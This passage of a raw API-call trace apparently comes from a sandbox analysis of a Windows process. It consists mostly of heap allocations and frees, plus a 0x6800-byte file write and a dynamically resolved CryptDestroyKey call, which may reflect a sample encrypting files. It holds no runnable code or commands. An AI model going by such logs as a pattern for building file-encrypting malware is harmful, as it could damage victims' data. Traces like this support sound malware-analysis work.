lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0268.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0268.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0268.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0268.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x6800) returned 0x2f30038 [0268.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f3d048 | out: hHeap=0x970000) returned 1 [0268.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0268.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0268.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x6800) returned 0x2f3d048 [0268.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f30038 | out: hHeap=0x970000) returned 1 [0268.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0268.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0268.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0268.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0268.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0268.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0268.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0268.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0268.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0268.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0268.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0268.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0268.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0268.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c98 | out: hHeap=0x970000) returned 1 [0268.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0268.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0268.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0268.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f88 | out: hHeap=0x970000) returned 1 [0268.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0268.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0268.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f153a0 | out: hHeap=0x970000) returned 1 [0268.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0268.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0268.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0268.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0268.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0268.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0268.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0268.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0268.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0268.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0268.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0268.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0268.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f29830 | out: hHeap=0x970000) returned 1 [0268.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0268.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0268.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0268.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0268.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0268.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0268.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0268.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0268.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0268.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0268.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0268.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0268.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0268.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0268.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0268.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0268.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0268.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f23028 | out: hHeap=0x970000) returned 1 [0268.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0268.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0268.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0268.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0268.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0268.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f36840 | out: hHeap=0x970000) returned 1 [0268.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0268.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0268.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0268.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0268.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0268.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0268.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0268.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0268.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0268.291] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0268.291] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.291] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0268.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0268.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0268.292] WriteFile (in: hFile=0x2a0, lpBuffer=0x2f16018*, nNumberOfBytesToWrite=0x6800, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f16018*, lpNumberOfBytesWritten=0x8cf5e4*=0x6800, lpOverlapped=0x0) returned 1 [0268.294] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0268.294] TranslateMessage (lpMsg=0x8cf708) returned 0 [0268.294] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0268.294] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0268.294] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0268.294] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0268.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0268.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0268.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0268.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0268.294] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0268.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0268.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0268.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0268.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0268.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0268.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0268.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e516a0 [0268.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0268.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51880 [0268.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51730 [0268.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0268.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51898 [0268.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0268.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0268.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51658 [0268.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0268.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0268.295] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0268.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0268.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0268.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0268.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e550b8 [0268.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0268.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0268.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0268.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0268.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519d0 [0268.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0268.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0268.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0268.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0268.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0268.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0268.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0268.296] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0268.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0268.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0268.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0268.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0268.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0268.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0268.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0268.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0268.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0268.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0268.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0268.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0268.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0268.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0268.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0268.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0268.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0268.296] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0268.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0268.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0268.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b98 [0268.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0268.296] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0268.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0268.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0268.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0268.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0268.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0268.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0268.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0268.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0268.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0268.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0268.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0268.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0268.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0268.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0268.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0268.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0268.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0268.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0268.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0268.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0268.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0268.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0268.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0268.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0268.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0268.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0268.297] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0268.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0268.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0268.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0268.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0268.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0268.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0268.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0268.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0268.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0268.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0268.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0268.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0268.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0268.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0268.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0268.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0268.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0268.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0268.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0268.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0268.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0268.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0268.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e51988, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0268.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0268.299] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0268.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0268.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0268.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0268.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0268.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0268.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0268.299] CryptDestroyKey (hKey=0xa87250) returned 1 [0268.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14f50 [0268.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0268.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0268.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0268.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0268.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0268.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0268.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0268.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0268.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0268.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0268.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0268.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0268.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0268.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0268.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0268.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0268.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0268.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0268.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0268.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0268.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0268.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0268.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0268.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | 